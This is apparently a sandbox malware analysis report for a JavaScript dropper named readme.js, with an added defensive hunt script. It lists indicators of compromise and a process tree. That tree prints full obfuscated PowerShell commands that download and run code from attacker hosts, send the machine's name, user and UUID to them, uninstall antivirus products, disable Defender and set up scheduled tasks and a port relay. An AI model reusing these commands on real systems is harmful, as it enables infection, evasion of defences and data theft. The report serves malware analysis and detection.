Analysis
max time kernel: 57s
max time network: 142s
platform: windows10_x64
resource: win10v20201028
submitted: 18-02-2021 18:36
Static task: static1
Behavioral task: behavioral1 (sample readme.js, resource win7v20201028)
Behavioral task: behavioral2 (sample readme.js, resource win10v20201028)
General
Target: readme.js
Size: 9KB
MD5: e294d6f427c64f77b5b61bb7b17dd12c
SHA1: ccdae3ada854cc441106ec52c12823439bab6cba
SHA256: 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
SHA512: 2c974b0969e4d9b3d1ded364c0a6033e827f0a4890730b9b062c76b690425f8fefc90aa8c9e6dfc599a7909e18a949c6a4b2d4b5dd5787a3bbac0834e70fe82a
Malware Config
Extracted URLs:
http://t.zz3r0.com
http://t.zer9g.com
http://t.bb3u9.com
http://t.bb3u9.com
Signatures
-
Blocklisted process makes network request 4 IoCs
flow | pid | process
8 | 1540 | powershell.exe
32 | 5072 | powershell.EXE
34 | 4976 | powershell.EXE
36 | 4976 | powershell.EXE
Executes dropped EXE 3 IoCs
pid | process
4732 | ye9zMSruN.exe
4844 | ye9zMSruN.exe
5016 | ye9zMSruN.exe
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 3 IoCs
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.EXE
File created | C:\Windows\System32\Windowspowershell\V1.0\ye9zMSruN.exe | powershell.EXE
File opened for modification | C:\Windows\System32\Windowspowershell\V1.0\ye9zMSruN.exe | powershell.EXE
Launches sc.exe
sc.exe is the Windows utility for controlling services; here it is used to disable, stop and delete services by name (see the process tree below).
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour"; that is the generic signature text, and nothing else in this report (no file encryption, no dropped note) supports a ransomware verdict for this sample.
-
Program crash 2 IoCs
pid | pid_target | process | target process
4932 | 4360 | WerFault.exe | powershell.EXE
2748 | 4976 | WerFault.exe | powershell.EXE
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
4136 | schtasks.exe
4820 | schtasks.exe
4620 | schtasks.exe
3780 | schtasks.exe
2156 | schtasks.exe
3364 | schtasks.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.EXE, ye9zMSruN.exe
All ioc paths below are relative to \REGISTRY\USER\.DEFAULT\. Nearly all of them are the per-profile certificate-store and Internet Settings zone keys that CryptoAPI and WinINet create on first use; seeing them under .DEFAULT tells you these processes ran in the SYSTEM profile (consistent with the /ru system scheduled tasks), not that the sample deliberately tampered with trust settings.
description | ioc | process
Key created | Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed\Certificates | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | ye9zMSruN.exe
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\Root\Certificates | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\trust\CRLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\trust\CRLs | ye9zMSruN.exe
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\trust\CTLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\TrustedPeople | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\trust\Certificates | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\trust | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\trust\CTLs | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\CA\CRLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\CA\CTLs | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | ye9zMSruN.exe
Key created | Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\CA\CRLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed\Certificates | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed\CTLs | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | ye9zMSruN.exe
Set value (data) | Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | ye9zMSruN.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\CA\CTLs | ye9zMSruN.exe
Key created | Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Opens file in notepad (likely ransom note) 1 IoCs
The file opened is the sample itself (readme.js): the visible notepad window is a decoy for the user while the hidden PowerShell stage runs (see the process tree below), so the "ransom note" label is the generic signature text, not a finding.
pid | process
1512 | notepad.exe
Suspicious behavior: EnumeratesProcesses 63 IoCs
pid | process | times recorded
1540 | powershell.exe | 3
3116 | powershell.exe | 3
4360 | powershell.EXE | 4
4932 | WerFault.exe | 17
5072 | powershell.EXE | 4
4976 | powershell.EXE | 4
2748 | WerFault.exe | 16
4732 | ye9zMSruN.exe | 4
4844 | ye9zMSruN.exe | 4
5016 | ye9zMSruN.exe | 4
Suspicious use of AdjustPrivilegeToken 64 IoCs
pid | process | privileges enabled (in the order recorded; 33 to 36 are privilege LUIDs the sandbox did not resolve to names)
1540 | powershell.exe | SeDebugPrivilege, then twice in a row the full set SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (43 entries)
3116 | powershell.exe | SeDebugPrivilege (1 entry)
3768 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (20 entries)
Suspicious use of WriteProcessMemory 64 IoCs
32 distinct parent/child pairs, each recorded twice. Format: pid process -> target pid target process
3920 wscript.exe -> 856 cmd.exe
856 cmd.exe -> 1512 notepad.exe
856 cmd.exe -> 1540 powershell.exe
1540 powershell.exe -> 200 cmd.exe
1540 powershell.exe -> 3116 powershell.exe
1540 powershell.exe -> 2964 cmd.exe
2964 cmd.exe -> 3200 WMIC.exe
1540 powershell.exe -> 3364 schtasks.exe
3364 schtasks.exe -> 3768 WMIC.exe
1540 powershell.exe -> 2112 cmd.exe
2112 cmd.exe -> 1264 WMIC.exe
1540 powershell.exe -> 68 cmd.exe
68 cmd.exe -> 2696 cmd.exe
1540 powershell.exe -> 3484 cmd.exe
3484 cmd.exe -> 4056 WMIC.exe
1540 powershell.exe -> 3444 cmd.exe
3444 cmd.exe -> 3700 WMIC.exe
1540 powershell.exe -> 2132 cmd.exe
2132 cmd.exe -> 2200 WMIC.exe
1540 powershell.exe -> 2988 cmd.exe
1540 powershell.exe -> 3364 schtasks.exe
1540 powershell.exe -> 4136 schtasks.exe
1540 powershell.exe -> 4340 schtasks.exe
1540 powershell.exe -> 4820 schtasks.exe
1540 powershell.exe -> 5052 schtasks.exe
1540 powershell.exe -> 4620 schtasks.exe
1540 powershell.exe -> 4956 schtasks.exe
5072 powershell.EXE -> 4560 cmd.exe
5072 powershell.EXE -> 4608 cmd.exe
5072 powershell.EXE -> 4632 cmd.exe
4560 cmd.exe -> 4728 cmd.exe
4560 cmd.exe -> 4732 ye9zMSruN.exe
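The signatures above record what this sample leaves on a host: SYSTEM scheduled tasks that launch hidden PowerShell, a portproxy relay and firewall rules added through netsh, a binary dropped next to powershell.exe, services stopped and deleted through sc.exe, and Defender real-time monitoring switched off. The following hunt script is an added example, not part of the sandbox report. The task names, port, firewall rule names, service names and dropped file name are taken from this report's process tree; the registry location of portproxy entries and the cmdlets are standard Windows. Run it in an elevated PowerShell on the host under investigation.

```powershell
# Added hunt script (not from the sandbox report). Literal names come from the
# process tree in this report; each check also has a structural form so that a
# renamed variant of the same technique is still reported.

$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Check, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
}

# 1. Scheduled tasks: names seen in the report, or any SYSTEM task whose action is hidden PowerShell.
$ReportTaskNames = 'blackball', 'zE1gPp', 'vn2exu8wFSI', 'GsAVTRS', 'Rtsa', 'Rtsa1', 'Rtsa2'
foreach ($t in Get-ScheduledTask) {
    $action   = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' '
    $asSystem = $t.Principal.UserId -match '^(SYSTEM|S-1-5-18)$'
    if ($t.TaskName -in $ReportTaskNames) {
        Add-Finding 'Task name from report' "$($t.TaskPath)$($t.TaskName) -> $action"
    } elseif ($asSystem -and $action -match '(?i)powershell.*-w(indowstyle)?\s+hidden') {
        Add-Finding 'SYSTEM task runs hidden PowerShell' "$($t.TaskPath)$($t.TaskName) -> $action"
    }
}

# 2. portproxy: netsh persists v4tov4 entries under this key; the sample's entry
#    shows up as value "*/65529" with data "1.1.1.1/53". Legitimate use on an
#    endpoint is rare, so every entry is reported.
$ppKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
if (Test-Path $ppKey) {
    $pp = Get-Item $ppKey
    foreach ($name in $pp.GetValueNames()) {
        Add-Finding 'portproxy entry' "$name -> $($pp.GetValue($name))"
    }
}

# 3. Firewall rules: the names the sample uses (deny445/deny135 block inbound SMB
#    and RPC, SDNSd opens TCP 65529) plus any rule touching port 65529 under another name.
foreach ($r in Get-NetFirewallRule) {
    $ports = @(($r | Get-NetFirewallPortFilter).LocalPort)
    if ($r.DisplayName -in 'deny445', 'deny135', 'SDNSd' -or $ports -contains '65529') {
        Add-Finding 'Firewall rule' "$($r.DisplayName): $($r.Direction) $($r.Action) localport=$($ports -join ',')"
    }
}

# 4. The dropped EXE sat beside powershell.exe. Report it by name, and report any
#    EXE in that directory that is not validly Microsoft-signed (powershell.exe
#    itself is catalog-signed and passes).
$psDir = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0'
foreach ($f in Get-ChildItem -Path $psDir -Filter *.exe) {
    $sig      = Get-AuthenticodeSignature -FilePath $f.FullName
    $msSigned = ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Subject -like '*Microsoft*')
    if ($f.Name -ieq 'ye9zMSruN.exe' -or -not $msSigned) {
        Add-Finding 'Unexpected EXE in PowerShell directory' "$($f.FullName) signature=$($sig.Status)"
    }
}

# 5. Defender real-time protection (the sample runs Set-MpPreference -DisableRealtimeMonitoring 1).
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp -and $mp.DisableRealtimeMonitoring) {
    Add-Finding 'Defender real-time monitoring disabled' 'Get-MpPreference reports DisableRealtimeMonitoring = True'
}

# 6. Services the sample disables, stops and deletes. None of these names is a
#    Windows component, so any that exists on the host warrants review.
foreach ($s in Get-Service -Name 'xWinWpdSrv', 'SVSHost', 'Microsoft Telemetry' -ErrorAction SilentlyContinue) {
    Add-Finding 'Service name targeted by sample' "$($s.Name) ($($s.Status))"
}

if ($Findings.Count -eq 0) { 'No artifacts from this report were found on this host.' }
$Findings | Format-Table -AutoSize
```

Cleanup for a confirmed hit is the inverse of what the tree shows: Unregister-ScheduledTask for the tasks, `netsh interface portproxy delete v4tov4 listenport=65529` for the relay, Remove-NetFirewallRule for the three rules, and Set-MpPreference -DisableRealtimeMonitoring $false. Removing deny445 and deny135 re-exposes SMB and RPC, so check what the host's baseline policy expects before deleting them. The portproxy check is the most reliable of the six, because a v4tov4 entry survives reboots and is almost never created by legitimate endpoint software.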
Processes
Process tree as recorded by the sandbox. [n] is the depth in the tree; each entry shows the image path, then the command line, then the signatures that fired for that process.

[1] C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\notepad.exe
        notepad C:\Users\Admin\AppData\Local\Temp\readme.js
        - Opens file in notepad (likely ransom note)
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
          - Creates scheduled task(s)
          - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \zE1gPp /F /tr "powershell -w hidden -c PS_CMD"
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn \zE1gPp
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn ycgz21vl\vn2exu8wFSI /F /tr "powershell -w hidden -c PS_CMD"
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn ycgz21vl\vn2exu8wFSI
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\uD5X7oWL\GsAVTRS /F /tr "powershell -w hidden -c PS_CMD"
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\uD5X7oWL\GsAVTRS
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
        [5] C:\Windows\system32\netsh.exe
            netsh.exe firewall add portopening tcp 65529 SDNSd
      [4] C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
      [4] C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
      [4] C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
[1] C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4360 -s 24842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|ye9zMSruN.exe -2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&MKLUFVRL^&00000000-0000-0000-0000-000000000000^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\ye9zMSruN.exeye9zMSruN.exe -3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|ye9zMSruN.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe2⤵
-
- [depth 3] C:\Windows\system32\cmd.exe
